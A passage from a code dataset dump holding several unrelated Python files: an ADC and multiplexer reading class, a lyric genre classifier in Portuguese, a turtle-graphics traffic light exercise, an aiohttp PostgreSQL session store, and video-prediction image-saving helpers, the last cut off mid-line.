MUX configuration for this pin, add it to the MUX list\r\n self._mux_object.add_mux_slot('ADC', pin, self.SCAN_PINS_MUX[scan_idx][:3], self.SCAN_PINS_MUX[scan_idx][-1])\r\n \r\n # Create a corresponding output dictionary and add it to the all_devices list\r\n self.all_devices.append({'chn':pin, 'val':0, 'cnt':0, 'actv':False, 'sublist':[]})\r\n \r\n \r\n def validate_pin(self, pin):\r\n \"\"\" Returns scan_idx, mraa_idx if succesful, -1, -1 if not. \r\n The scan_idx is the pin index in the class scan list.\r\n The mraa_idx is the pin number used by the mraa library. \"\"\"\r\n idx = None\r\n try: # Parse the input parameter\r\n if isinstance(pin, str):\r\n idx = str2idx[pin] # Pin is in string format -> use dict\r\n except KeyError: # Key error means it's not in str2idx dict.\r\n return -1, -1\r\n \r\n if not idx and isinstance(pin, int):\r\n idx = pin # If pin is already a number, save it\r\n \r\n if idx is None: # If we don't have a index by now -> error\r\n return -1, -1\r\n \r\n try:\r\n mraa_idx = idx2mraa[idx] # Convert index to mraa index\r\n except KeyError: # Key error -> pin is not mraa ADC pin \r\n return -1, -1\r\n \r\n try: # Get the scan index from the class scan list\r\n scan_idx = self.SCAN_PINS.index(idx) \r\n except ValueError: # Value Error -> pin not in class scan list\r\n return -1, mraa_idx\r\n \r\n return scan_idx, mraa_idx\r\n \r\n def get_mv(self, pin):\r\n \"\"\" Gets the Voltage value reading of the specified ADC channel pin.\r\n Only works on the class list of initialized pins. \"\"\"\r\n # Validate the input pin channel. Also get the index info\r\n scan_idx, mraa_idx = self.validate_pin(pin)\r\n \r\n if mraa_idx is -1: # Given pin is not a mraa ADC pin\r\n raise ValueError(\"Parameter error: pin should either be a number 0-6 or a string(e.g. P9_39)\")\r\n if scan_idx is -1: # Given pin is a mraa ADC pin, but is not in the list\r\n raise ValueError(\"Parameter error: pin is correct but is not on the list of initialized pins\")\r\n \r\n # Since 1.8V is maximum, rescale the float reading accordingly\r\n return 1.8 * self._pin_objects[scan_idx].readFloat()\r\n \r\n def get_all_mv(self):\r\n \"\"\" Gets the Voltage value reading of all the configured ADC channel pins.\r\n Returns a list of voltage values corresponding to the scan list.\r\n If any mux is connected, a list will be returned instead of a value in\r\n the corresponding channel slot (e.g. [1, 2, [3, 3, 3, ... 3]])\"\"\"\r\n ret = [] # Init return object to an epty list\r\n for pin in self.SCAN_PINS: # Go through all pins in the ADC scan list\r\n # Append the MUXed values to the return object. This is either one\r\n # value (no MUX connected), or a list of values (MUX connected)\r\n ret.append(self._mux_object.get_muxed_values(pin, self.get_mv, pin))\r\n return ret # Return the return object\r\n \r\n def _update_channel(self, chn, val):\r\n \"\"\" Updates a specific channel with a milivolt value. If the milivolt value is a list,\r\n as would be the case for a MUX, the subchannels are updated accordingly.\r\n Returns a message list of the type: {'chn', 'subchn', 'event':'disc'/'conn'/'none', 'mux':'disc'/'conn'/'none'}\"\"\"\r\n # Get the channel index corresponding to the current channel element\r\n chn_idx = next((index for (index, d) in enumerate(self.all_devices) if d[\"chn\"] == chn))\r\n c_dict = self.all_devices[chn_idx] # Select the current element dictionary\r\n ret_list = [] # Initialize the return object to an empty list\r\n \r\n if isinstance(val, list): # Check if we are dealing with a MUXed value or not\r\n c_dict['val'] = -1 # Since val is a list -> we will use the 'sublist'\r\n c_dict['actv'] = False # Reset the 'actv' value\r\n mux_con_flag = False # Goes 'True' if this is the iteration which detected the MUX\r\n for val_idx, val_mv in enumerate(val):\r\n try: # Try and get the dictionary of the MUXed value index\r\n sbchn_idx = next((index for (index, d) in enumerate(c_dict['sublist']) if d[\"subchn\"] == val_idx))\r\n sbchn_dict = c_dict['sublist'][sbchn_idx] # Get the subchannel dictionanry\r\n sbchn_dict['val'] = val_mv # Set the subchannel voltage value to the measured one\r\n if val_mv <= 0.005 and sbchn_dict['cnt'] > 0:\r\n sbchn_dict['cnt'] -= 1 # Decrease counter value if new voltage is almost 0\r\n if sbchn_dict['cnt'] == 0 and sbchn_dict['actv']:\r\n sbchn_dict['actv'] = False # Disable channel if the counter reached 0\r\n # Add disconnected event to return list\r\n ret_list.append({'chn':chn, 'subchn':sbchn_idx, 'event':'disc', 'mux':'none'})\r\n elif val_mv >= 0.005 and sbchn_dict['cnt'] < self.timeout_ticks:\r\n sbchn_dict['cnt'] += 1 # Increment counter value if new voltage is not 0\r\n if sbchn_dict['cnt'] == self.timeout_ticks and sbchn_dict['actv'] == False:\r\n sbchn_dict['actv'] = True # Enable channel if the counter reached the threshold\r\n # Add connected event to return list\r\n ret_list.append({'chn':chn, 'subchn':sbchn_idx, 'event':'conn', 'mux':'none'})\r\n if sbchn_dict['actv'] == True: # For any active subchannel, the channel is active\r\n c_dict['actv'] = True\r\n except: # We don't have a dictionary for the MUXed value yet -> add a default one\r\n c_dict['sublist'].append({'chn':chn, 'subchn':val_idx, 'val':val_mv, 'cnt':1, 'actv':False})\r\n mux_con_flag = True # Mux connected event detected!\r\n if mux_con_flag: # Return MUX connected event. Used flag to avoid multiple instances of same event\r\n ret_list.append({'chn':chn, 'subchn':-1, 'event':'none', 'mux':'conn'})\r\n else: # We are NOT dealing with a MUXed value -> No mux connected\r\n if len(c_dict['sublist']) > 0: # Return MUX disconnected event\r\n ret_list.append({'chn':chn, 'subchn':-1, 'event':'none', 'mux':'disc'})\r\n c_dict['sublist'] = [] # Since no MUX connected -> we have no sublist\r\n c_dict['val'] = val # Since val is a value -> update it\r\n \r\n if val <= 0.005 and c_dict['cnt'] > 0: # Reading of 0 on an existing channel with cnt > 0\r\n c_dict['cnt'] -= 1 # Decrease counter value\r\n if c_dict['cnt'] == 0 and c_dict['actv']:\r\n c_dict['actv'] = False # Disable channel if the counter reached 0\r\n ret_list.append({'chn':chn, 'subchn':-1, 'event':'disc', 'mux':'none'})\r\n elif val >= 0.005 and c_dict['cnt'] < self.timeout_ticks:\r\n c_dict['cnt'] += 1 # Increment counter value\r\n if c_dict['cnt'] == self.timeout_ticks and c_dict['actv'] == False:\r\n c_dict['actv'] = True # Enable channel if the counter reached the threshold\r\n ret_list.append({'chn':chn, 'subchn':-1, 'event':'conn', 'mux':'none'})\r\n return ret_list\r\n \r\n \r\n def update_devices(self):\r\n \"\"\" Updates the connected devices dictionary list. Returns a new list of \r\n dictionaries on the form of {'chn', 'subchn', 'event':'disc'/'conn'/'none', 'mux':'disc'/'conn'/'none'}\"\"\"\r\n ret_list = [] # Init the return object to an empty list\r\n milivolts = self.get_all_mv() # Get all voltage levels (MUX values included) \r\n for scan_idx, mv_val in enumerate(milivolts): # Go through all scan channels and update them\r\n chn = self.SCAN_PINS[scan_idx] # Get the pin channel from the scan index\r\n new_elems = self._update_channel(chn, mv_val)\r\n ret_list += new_elems # Update the return list\r\n \r\n self.connected_devices = [] # Update connected devices - start by clearing previous results\r\n for elem in self.all_devices: # Go through all channels dictionary list \r\n if elem['actv']: # Only care about active channels\r\n if len(elem['sublist']) > 0: # Check if channel has a connected MUX\r\n for sub_elem in elem['sublist']:\r\n if sub_elem['actv']: # Create entries for all active subchannels\r\n self.connected_devices.append({'chn':sub_elem['chn'], 'subchn':sub_elem['subchn'], 'val':sub_elem['val'], 'cnt':sub_elem['cnt'], 'actv':True})\r\n else: # No MUX -> just create the entry\r\n self.connected_devices.append({'chn':elem['chn'], 'subchn':-1, 'val':elem['val'], 'cnt':elem['cnt'], 'actv':True})\r\n \r\n return ret_list\r\n \r\n \r\n \"\"\" List of scan pins to be initialized. SHOULD BE CONSTAT THROUGHT EXECUTION \"\"\"\r\n SCAN_PINS = [0, 1, 2]\r\n \r\n \"\"\" Set here the MUX pins for each scan pin. Mux pins are(in order): A, B, C, detect \"\"\"\r\n SCAN_PINS_MUX = [None, [\"P8_41\", \"P8_42\", \"P8_43\", \"P8_44\"], None]\r\n \r\n \"\"\" The MUX object for the ADC. \"\"\"\r\n _mux_object = None\r\n \r\n \"\"\" List of all initialized pin objects. Created from the list of scan pins. \"\"\"\r\n _pin_objects = []\r\n \r\n \"\"\" List of connected devices dictionary. Contains: {chn, subchn, val, cnt, actv}.\r\n Subchannel is -1 in case no MUX is connected. \"\"\"\r\n connected_devices = []\r\n \r\n \"\"\" List of all devices dictionary. Contains: {chn, val, cnt, actv, sublist}. Val is -1 for MUXed channels.\r\n Sublist is a list of dictionaries for all MUXed values: {subchn, val, cnt, actv}\"\"\"\r\n all_devices = []\r\n \r\n \"\"\" Number of ticks for a timeout. If the output is 0 for more ticks than \r\n this value, the devices is considered disconnected. \"\"\"\r\n timeout_ticks = 5\r\n","sub_path":"SoftWEAR/Python/RoboADC.py","file_name":"RoboADC.py","file_ext":"py","file_size_in_byte":12383,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"552452564","text":"import pandas as pd\r\nimport numpy as np\r\nimport nltk\r\nfrom nltk.corpus import stopwords\r\n\r\n# nltk.download('stopwords')\r\n\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.pipeline import Pipeline\r\nfrom sklearn.feature_extraction.text import TfidfVectorizer\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.preprocessing import LabelEncoder, MinMaxScaler\r\nfrom sklearn.naive_bayes import MultinomialNB\r\nfrom sklearn.linear_model import SGDClassifier\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn.model_selection import KFold\r\n\r\nimport pickle\r\n\r\nfrom unicodedata import normalize\r\n\r\ndf_bossa = pd.read_csv('./data/bossa_nova.csv')\r\n\r\ndf_funk = pd.read_csv('./data/funk.csv')\r\n\r\ndf_gospel = pd.read_csv('./data/gospel.csv')\r\n\r\ndf_sertanejo = pd.read_csv('./data/sertanejo.csv')\r\n\r\n# cria base de dados única\r\n\r\ndf_bossa['genre'] = 'bossa'\r\ndf_funk['genre'] = 'funk'\r\ndf_gospel['genre'] = 'gospel'\r\ndf_sertanejo['genre'] = 'sertanejo'\r\n\r\nframes = [df_bossa, df_funk, df_gospel, df_sertanejo]\r\n\r\nbase_dados = pd.concat(frames, ignore_index = True)\r\n\r\ndef preprocessamento(df):\r\n # converte letras para lowercase\r\n df['lyric'] = df['lyric'].apply(lambda x: x.lower())\r\n\r\n # remove pontuação\r\n df['lyric'] = df['lyric'].str.replace(r'[^\\w\\s]', '')\r\n \r\n # remove acentos\r\n df['lyric'] = df['lyric'].apply(lambda x: normalize('NFKD', x).encode('ASCII', 'ignore').decode('ASCII'))\r\n\r\n # remove \\n|\\r|\\n\\r\r\n df['lyric'] = df['lyric'].str.replace(r'\\n|\\r|\\n\\r', ' ')\r\n\r\n # remove stopwords\r\n stop = set(stopwords.words('portuguese'))\r\n df['lyric'] = df['lyric'].apply(lambda x: ' '.join([word for word in x.split() if word not in (stop)]))\r\n \r\n # convertendo label 'genre' para números\r\n le = LabelEncoder()\r\n df['genre'] = le.fit(df['genre']).transform(df['genre'])\r\n \r\n return df\r\n\r\ndf = preprocessamento(base_dados)\r\n\r\n# normalizacao \r\ntfidf_vec = TfidfVectorizer()\r\ntfidf_vec.set_params(stop_words=None, max_features=30000, min_df=4, ngram_range=(1, 2))\r\ntfidf = tfidf_vec.fit(df.lyric)\r\nX = tfidf_vec.transform(df.lyric)\r\n\r\npickle.dump(tfidf, open(\"tfidf_vec.pickle\", \"wb\"))\r\n\r\nscale = MinMaxScaler()\r\nX = scale.fit_transform(X.toarray())\r\n\r\nX = pd.DataFrame(X)\r\ny = df.genre\r\n\r\nx_train, x_test, y_train, y_test = train_test_split(X, y, test_size = .1, random_state=200)\r\n\r\nresultados = []\r\n\r\nlr = LogisticRegression()\r\nfit = lr.fit(x_train, y_train)\r\npred = fit.predict(x_test)\r\naccuracy = accuracy_score(y_test, pred)\r\n\r\nresultados.append({ \"Classificador\" : \"Logistic Regression\", \r\n \"Acurácia\" : \"%.4f\" % accuracy, \r\n })\r\n\r\nnb = MultinomialNB()\r\nfit = nb.fit(x_train, y_train)\r\npred = fit.predict(x_test)\r\naccuracy = accuracy_score(y_test, pred)\r\n\r\nresultados.append({ \"Classificador\" : \"Naive Bayes\", \r\n \"Acurácia\" : \"%.4f\" % accuracy, \r\n })\r\n\r\nsgdc = SGDClassifier(loss='hinge', penalty='l2',\r\n alpha=1e-3, random_state=42)\r\nfit = sgdc.fit(x_train, y_train)\r\npred = fit.predict(x_test)\r\naccuracy = accuracy_score(y_test, pred)\r\n\r\nresultados.append({ \"Classificador\" : \"SGDC\", \r\n \"Acurácia\" : \"%.4f\" % accuracy, \r\n })\r\n\r\ndecision = MLPClassifier(alpha=1)\r\nfit = decision.fit(x_train, y_train)\r\npred = fit.predict(x_test)\r\naccuracy = accuracy_score(y_test, pred)\r\nf1 = f1_score(y_test, pred, average=None)\r\n\r\nresultados.append({ \"Classificador\" : \"Neural Network\", \r\n \"Acurácia\" : \"%.4f\" % accuracy, \r\n })\r\n\r\nX = X.loc[:,:].values\r\ny = y.loc[:].values\r\n\r\nkf = KFold(n_splits=10)\r\n\r\nclassificadores = [LogisticRegression(),\r\n MultinomialNB(),\r\n SGDClassifier(loss='hinge', penalty='l2', alpha=1e-3, random_state=42),\r\n MLPClassifier(alpha=1),\r\n ]\r\n\r\nidentificacao = [\r\n 'Logistic Regression',\r\n 'Naive Bayes', \r\n 'SGDC', \r\n 'Neural Network',\r\n ]\r\n\r\nacuracia = {}\r\n\r\nfor i in identificacao:\r\n acuracia[i] = []\r\n \r\nfor train, test in kf.split(X):\r\n X_train, X_test, y_train, y_test = X[train], X[test], y[train], y[test]\r\n \r\n for ident, clas in zip(identificacao, classificadores):\r\n fit = clas.fit(X_train, y_train)\r\n pred = fit.predict(X_test)\r\n acuracia[ident].append(accuracy_score(y_test, pred))\r\n\r\nresultados2 = []\r\n\r\nfor i in identificacao:\r\n resultados2.append({ \"Classificador\" : i, \r\n \"Acurácia (Kfold)\" : \"%.4f ± %.4f \" % (np.mean(acuracia[i]), np.std(acuracia[i])), \r\n })\r\n\r\npd.DataFrame(resultados)\r\n\r\npd.DataFrame(resultados2)\r\n","sub_path":"src/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":4780,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"119190757","text":"import turtle\r\nimport sys\r\n\r\n#turtle.setup(400,500)\r\nwn= turtle.Screen()\r\nwn.setup(400,500)\r\nwn.title(\"Tess becomes a traffic light!\")\r\nwn.bgcolor(\"lightgreen\")\r\ntess= turtle.Turtle()\r\n\r\ndef draw_housing():\r\n \"\"\" Draw a nice housing to hold the traffic lights \"\"\"\r\n tess.pensize(3)\r\n tess.color(\"black\", \"darkgrey\")\r\n tess.begin_fill()\r\n tess.forward(80)\r\n tess.left(90)\r\n tess.forward(200)\r\n tess.circle(40,180)\r\n tess.forward(200)\r\n tess.left(90)\r\n tess.end_fill()\r\n\r\n\r\ndraw_housing()\r\ntess.penup()\r\n\r\ntess.forward(40)\r\ntess.left(90)\r\ntess.forward(50)\r\n\r\ntess.shape(\"circle\")\r\ntess.shapesize(3)\r\ntess.fillcolor(\"green\")\r\n\r\nstate_num = 0\r\n\r\n\r\ndef advance_state_machine():\r\n global state_num\r\n if state_num == 0:\r\n tess.forward(70)\r\n tess.fillcolor(\"orange\")\r\n state_num=1\r\n elif state_num == 1:\r\n tess.forward(70)\r\n tess.fillcolor(\"red\")\r\n state_num=2\r\n else:\r\n tess.back(140)\r\n tess.fillcolor(\"green\")\r\n state_num =0\r\n\r\n\r\n\r\nlargura= tess.pensize()\r\ndef increase():\r\n global largura\r\n if largura < 20 :\r\n largura = largura + 1\r\n tess.width(largura)\r\n\r\ndef decrease():\r\n global largura\r\n if largura > 1:\r\n largura = largura -1\r\n tess.width(largura)\r\n\r\n\r\ncode_color= 0\r\ndef background():\r\n global code_color\r\n if code_color == 0:\r\n wn.bgcolor(\"lightgreen\")\r\n code_color =1\r\n elif code_color== 1:\r\n wn.bgcolor(\"grey\")\r\n code_color =2\r\n else:\r\n wn.bgcolor(\"purple\")\r\n code_color=0\r\n\r\n\r\ndef blue():\r\n \"Atributtes color blue\"\r\n tess.fillcolor(\"blue\")\r\n\r\ndef green():\r\n \"Atributtes color green\"\r\n tess.fillcolor(\"green\")\r\n\r\ndef red():\r\n \"Atributtes color red\"\r\n tess.fillcolor(\"red\")\r\n\r\n\r\n\r\nwn.onkey(advance_state_machine, \"space\")\r\n#MODIFICADO POR MIM\r\nwn.onkey(increase,\"+\")\r\nwn.onkey(decrease,\"-\")\r\nwn.onkey(background,\"c\")\r\nwn.onkey(blue,\"b\")\r\nwn.onkey(green,\"g\")\r\nwn.onkey(red,\"r\")\r\n#FIM DA MODIFICAÇÃO\r\nwn.listen()\r\nwn.mainloop()","sub_path":"lista2/questao1.py","file_name":"questao1.py","file_ext":"py","file_size_in_byte":2043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"538484187","text":"try:\n import asyncpg\nexcept ImportError: # pragma: no cover\n asyncpg = None\ntry:\n import aiopg\nexcept ImportError: # pragma: no cover\n aiopg = None\n\nimport re\nimport json\nimport uuid\nimport asyncio\nfrom datetime import datetime, timedelta\nfrom . import AbstractStorage, Session\n\n\nRE_PG_IDENTIFIERS = re.compile('[^\\W\\d][\\w$]{0,62}')\nRE_QUERY_PARAMS = re.compile(' \\$\\d ')\n\n\nclass PostgresqlAbstractStorage(AbstractStorage):\n \"\"\"Postgresql abstract storage\"\"\"\n\n def __init__(self, driver_pool, *, cookie_name=\"AIOHTTP_SESSION\",\n domain=None, max_age=None, path='/',\n secure=None, httponly=True,\n key_factory=lambda: uuid.uuid4().hex,\n encoder=json.dumps, decoder=json.loads,\n schema_name='public', table_name='aiohttp_session',\n column_name_key='key', column_name_data='data',\n column_name_expire='expire', data_type='text',\n timeout=None):\n super().__init__(cookie_name=cookie_name, domain=domain,\n max_age=max_age, path=path, secure=secure,\n httponly=httponly,\n encoder=encoder, decoder=decoder)\n self._key_factory = key_factory\n self._driver_pool = driver_pool\n self._timeout = timeout\n self._task_delete_exired = None\n\n self._schema_name = str(schema_name)\n if not RE_PG_IDENTIFIERS.fullmatch(self._schema_name):\n raise ValueError('Schema name \"{}\" is invalid Postgresql name'\n .format(schema_name))\n self._table_name = str(table_name)\n if not RE_PG_IDENTIFIERS.fullmatch(self._table_name):\n raise ValueError('Table name \"{}\" is invalid Postgresql name'\n .format(table_name))\n self._column_name_key = str(column_name_key)\n if not RE_PG_IDENTIFIERS.fullmatch(self._column_name_key):\n raise ValueError('Column name \"{}\" is invalid Postgresql name'\n .format(column_name_key))\n self._column_name_data = str(column_name_data)\n if not RE_PG_IDENTIFIERS.fullmatch(self._column_name_data):\n raise ValueError('Column name \"{}\" is invalid Postgresql name'\n .format(column_name_data))\n self._column_name_expire = str(column_name_expire)\n if not RE_PG_IDENTIFIERS.fullmatch(self._column_name_expire):\n raise ValueError('Column name \"{}\" is invalid Postgresql name'\n .format(column_name_expire))\n self._data_type = str(data_type).lower()\n if self._data_type not in ('jsonb', 'text'):\n raise ValueError('Data type must be one of values: '\n '\"text\", \"jsonb\", got {}'\n .format(data_type))\n self._prepare_queries()\n\n def _prepare_queries(self):\n self._query_setup_table_if_not_exists = '''\n CREATE TABLE IF NOT EXISTS {schema_name}.{table_name} (\n {key} varchar(128) PRIMARY KEY NOT NULL,\n {data} {data_type} DEFAULT '{{}}' NOT NULL,\n {expire} timestamp without time zone\n );\n CREATE INDEX IF NOT EXISTS {table_name}_{expire}\n ON {table_name} ({expire});\n '''.format(\n schema_name=self._schema_name,\n table_name=self._table_name,\n key=self._column_name_key,\n data=self._column_name_data,\n data_type=self._data_type.upper(),\n expire=self._column_name_expire,\n )\n self._query_delete_expired_sessions = '''\n DELETE FROM {schema_name}.{table_name} WHERE {expire} <= $1 ;\n '''.format(\n schema_name=self._schema_name,\n table_name=self._table_name,\n expire=self._column_name_expire,\n )\n self._query_load_session = '''\n SELECT {data} FROM {schema_name}.{table_name} WHERE\n {key} = $1 AND\n ({expire} > $2 OR {expire} IS NULL);\n '''.format(\n schema_name=self._schema_name,\n table_name=self._table_name,\n key=self._column_name_key,\n data=self._column_name_data,\n expire=self._column_name_expire,\n )\n self._query_save_session = '''\n INSERT INTO {schema_name}.{table_name}({key}, {data}, {expire})\n VALUES ( $1 , $2 , $3 )\n ON CONFLICT ({key}) DO UPDATE SET\n {data}=EXCLUDED.{data},\n {expire}=EXCLUDED.{expire};\n '''.format(\n schema_name=self._schema_name,\n table_name=self._table_name,\n key=self._column_name_key,\n data=self._column_name_data,\n expire=self._column_name_expire,\n )\n\n async def _execute_query(self, query, *params):\n raise NotImplementedError('Storage for specific driver '\n 'must implement this method')\n\n async def _delete_expired_sessions(self):\n await self._execute_query(self._query_delete_expired_sessions,\n *(datetime.utcnow(),))\n await asyncio.sleep(self._delete_expired_every)\n self._task_delete_expired = asyncio.ensure_future(\n self._delete_expired_sessions())\n\n async def initialize(self, setup_table=True, delete_expired_every=3600):\n if setup_table:\n await self._execute_query(self._query_setup_table_if_not_exists)\n if delete_expired_every:\n self._delete_expired_every = delete_expired_every\n self._task_delete_expired = asyncio.ensure_future(\n self._delete_expired_sessions())\n\n def finalize(self):\n if hasattr(self, '_task_delete_expired'):\n self._task_delete_expired.cancel()\n\n async def load_session(self, request):\n cookie = self.load_cookie(request)\n if cookie is None:\n return Session(None, data=None, new=True, max_age=self.max_age)\n else:\n key = str(cookie)\n result = await self._execute_query(self._query_load_session,\n *(key, datetime.utcnow()),\n fetchrow=True)\n if result is None:\n return Session(None, data=None, new=True, max_age=self.max_age)\n else:\n data = result[0]\n try:\n data = self._decoder(data)\n except ValueError:\n data = None\n return Session(key, data=data, new=False, max_age=self.max_age)\n\n async def save_session(self, request, response, session):\n key = session.identity\n if key is None:\n key = self._key_factory()\n self.save_cookie(response, key,\n max_age=session.max_age)\n else:\n if session.empty:\n self.save_cookie(response, '',\n max_age=session.max_age)\n else:\n key = str(key)\n self.save_cookie(response, key,\n max_age=session.max_age)\n\n data = self._encoder(self._get_session_data(session))\n expire = datetime.utcnow() + timedelta(seconds=session.max_age) \\\n if session.max_age is not None else None\n await self._execute_query(self._query_save_session,\n *(key, data, expire))\n\n\nclass PostgresqlAsyncpgStorage(PostgresqlAbstractStorage):\n \"\"\"Postgresql asyncpg storage\"\"\"\n\n def __init__(self, asyncpg_pool, *args, **kwargs):\n super().__init__(asyncpg_pool, *args, **kwargs)\n if asyncpg is None:\n raise RuntimeError(\"Please install asyncpg\")\n if not isinstance(asyncpg_pool, asyncpg.pool.Pool):\n raise TypeError(\"Expexted asyncpg.pool.Pool got {}\".format(\n type(asyncpg_pool)))\n if self._data_type == 'jsonb':\n self._encoder = lambda x: x\n self._decoder = lambda x: x\n\n async def _execute_query(self, query, *params, fetchrow=False):\n async with self._driver_pool.acquire() as conn:\n if fetchrow:\n record = await conn.fetchrow(query, *params,\n timeout=self._timeout)\n return tuple(record.values()) if record else None\n else:\n await conn.execute(query, *params, timeout=self._timeout)\n\n\nclass PostgresqlAiopgStorage(PostgresqlAbstractStorage):\n \"\"\"Postgresql aiopg storage\"\"\"\n\n def __init__(self, aiopg_pool, *args, **kwargs):\n super().__init__(aiopg_pool, *args, **kwargs)\n if aiopg is None:\n raise RuntimeError(\"Please install aiopg\")\n if not isinstance(aiopg_pool, aiopg.pool.Pool):\n raise TypeError(\"Expexted aiopg.pool.Pool got {}\".format(\n type(aiopg_pool)))\n if self._data_type == 'jsonb':\n from psycopg2.extras import Json\n self._encoder = Json\n self._decoder = lambda x: x\n\n def _prepare_queries(self):\n super()._prepare_queries()\n self._query_delete_expired_sessions = \\\n RE_QUERY_PARAMS.sub(' %s ', self._query_delete_expired_sessions)\n self._query_load_session = \\\n RE_QUERY_PARAMS.sub(' %s ', self._query_load_session)\n self._query_save_session = \\\n RE_QUERY_PARAMS.sub(' %s ', self._query_save_session)\n\n async def _execute_query(self, query, *params, fetchrow=False):\n async with self._driver_pool.acquire() as conn:\n async with conn.cursor() as cur:\n await cur.execute(query, parameters=params,\n timeout=self._timeout)\n if fetchrow:\n return await cur.fetchone()\n","sub_path":"aiohttp_session/postgresql_storage.py","file_name":"postgresql_storage.py","file_ext":"py","file_size_in_byte":10206,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
+{"seq_id":"640830431","text":"from __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport argparse\nimport csv\nimport errno\nimport json\nimport os\nimport random\n\nimport numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.util import nest\n\nimport os, sys, inspect\n# sys.path.insert(0, '/home/angelina/deeprl_project/video_prediction-1/')\n\nfrom video_prediction import datasets, models, metrics\nfrom video_prediction.policies.servo_policy import ServoPolicy\nimport imageio\n\n\ndef compute_expectation_np(pix_distrib):\n assert pix_distrib.shape[-1] == 1\n pix_distrib = pix_distrib / np.sum(pix_distrib, axis=(-3, -2), keepdims=True)\n height, width = pix_distrib.shape[-3:-1]\n xv, yv = np.meshgrid(np.arange(width), np.arange(height))\n return np.stack([np.sum(yv[:, :, None] * pix_distrib, axis=(-3, -2, -1)),\n np.sum(xv[:, :, None] * pix_distrib, axis=(-3, -2, -1))], axis=-1)\n\n\ndef as_heatmap(image, normalize=True):\n import matplotlib.pyplot as plt\n image = np.squeeze(image, axis=-1)\n if normalize:\n image = image / np.max(image, axis=(-2, -1), keepdims=True)\n cmap = plt.get_cmap('viridis')\n heatmap = cmap(image)[..., :3]\n return heatmap\n\n\ndef rgb2gray(rgb):\n return np.dot(rgb[..., :3], [0.299, 0.587, 0.114])\n\n\ndef resize_and_draw_circle(image, size, center, radius, dpi=128.0, **kwargs):\n import matplotlib.pyplot as plt\n from matplotlib.patches import Circle\n import io\n height, width = size\n fig = plt.figure(figsize=(width / dpi, height / dpi), dpi=dpi)\n ax = fig.add_axes([0, 0, 1, 1])\n ax.imshow(image, interpolation='none')\n circle = Circle(center[::-1], radius=radius, **kwargs)\n ax.add_patch(circle)\n ax.axis(\"off\")\n fig.canvas.draw()\n trans = ax.figure.dpi_scale_trans.inverted()\n bbox = ax.bbox.transformed(trans)\n buff = io.BytesIO()\n plt.savefig(buff, format=\"png\", dpi=ax.figure.dpi, bbox_inches=bbox)\n buff.seek(0)\n image = plt.imread(buff)[..., :3]\n plt.close(fig)\n return image\n\n\ndef save_image_sequence(prefix_fname, images, overlaid_images=None, centers=None,\n radius=5, alpha=0.8, time_start_ind=0):\n import cv2\n import imageio\n head, tail = os.path.split(prefix_fname)\n if head and not os.path.exists(head):\n os.makedirs(head)\n if images.shape[-1] == 1:\n images = as_heatmap(images)\n if overlaid_images is not None:\n assert images.shape[-1] == 3\n assert overlaid_images.shape[-1] == 1\n gray_images = rgb2gray(images)\n overlaid_images = as_heatmap(overlaid_images)\n images = (1 - alpha) * gray_images[..., None] + alpha * overlaid_images\n gif_images = []\n for t, image in enumerate(images):\n image_fname = '%s_%02d.png' % (prefix_fname, time_start_ind + t)\n if centers is not None:\n scale = np.max(np.array([256, 256]) / np.array(image.shape[:2]))\n image = resize_and_draw_circle(image, np.array(image.shape[:2]) * scale, centers[t], radius,\n edgecolor='r', fill=False, linestyle='--', linewidth=2)\n image = (image * 255.0).astype(np.uint8)\n gif_images.append(image)\n image = cv2.cvtColor(image, cv2.COLOR_RGB2BGR) # imaes[:,:,::-1]\n #cv2.imwrite(image_fname, image)\n #print(\"GIF IMAGES SHAPE: {}\".format(np.array(gif_images).shape))\n return gif_images\n imageio.mimsave('{}.gif'.format(prefix_fname), gif_images)\n\n\ndef save_image_sequences(prefix_fname, images, overlaid_images=None, centers=None,\n radius=5, alpha=0.8, sample_start_ind=0, time_start_ind=0, ensemble=False):\n head, tail = os.path.split(prefix_fname)\n if head and not os.path.exists(head):\n os.makedirs(head)\n if overlaid_images is None:\n overlaid_images = [None] * len(images)\n if centers is None:\n centers = [None] * len(images)\n group_a, group_b, group_c, group_d = [], [], [], []\n for i, (images_, overlaid_images_, centers_) in enumerate(zip(images, overlaid_images, centers)):\n images_fname = '%s_%05d' % (prefix_fname, sample_start_ind + i)\n gif_images = save_image_sequence(images_fname, images_, overlaid_images_, centers_,\n radius=radius, alpha=alpha, time_start_ind=time_start_ind)\n gif_images = np.array(gif_images)\n #print(\"GIF IMAGES SHAPE: {}\".format(gif_images.shape))\n if not ensemble:\n gif_images = np.expand_dims(gif_images, 0)\n #import os.path\n numpy_name = '{}.npy'.format(prefix_fname)\n if not os.path.isfile(numpy_name):\n data = gif_images\n np.save(numpy_name, data)\n else:\n data = np.load(numpy_name)\n data = np.concatenate([data, gif_images], axis=0)\n np.save(numpy_name, data)\n #imageio.mimsave('{}.gif'.format(images_fname), gif_images)\n else:\n if i % 4 == 0:\n if len(group_a) == 0:\n group_a = gif_images\n else:\n group_a = np.concatenate([group_a, gif_images], axis=1)\n elif i % 4 == 1:\n if len(group_b) == 0:\n group_b = gif_images\n else:\n group_b = np.concatenate([group_b, gif_images], axis=1)\n elif i % 4 == 2:\n if len(group_c) == 0:\n group_c = gif_images\n else:\n group_c = np.concatenate([group_c, gif_images], axis=1)\n elif i % 4 == 3:\n if len(group_d) == 0:\n group_d = gif_images\n else:\n group_d = np.concatenate([group_d, gif_images], axis=1)\n if ensemble:\n for j, group in enumerate([group_a, group_b, group_c, group_d]):\n #imageio.mimsave('{0}_{1}_{2}_{3}.gif'.format(prefix_fname, sample_start_ind, j, i), group[i])\n # write the variance\n f = open(\"{}.txt\".format(prefix_fname), \"a+\")\n piece = group.shape[1] // 4\n enses = []\n for l in range(4):\n enses.append(group[:, l*piece:(l+1)*piece, :, :])\n # group is (x, 192, 64, 3)\n # enses is (4, x, 48, 64, 3)\n enses = 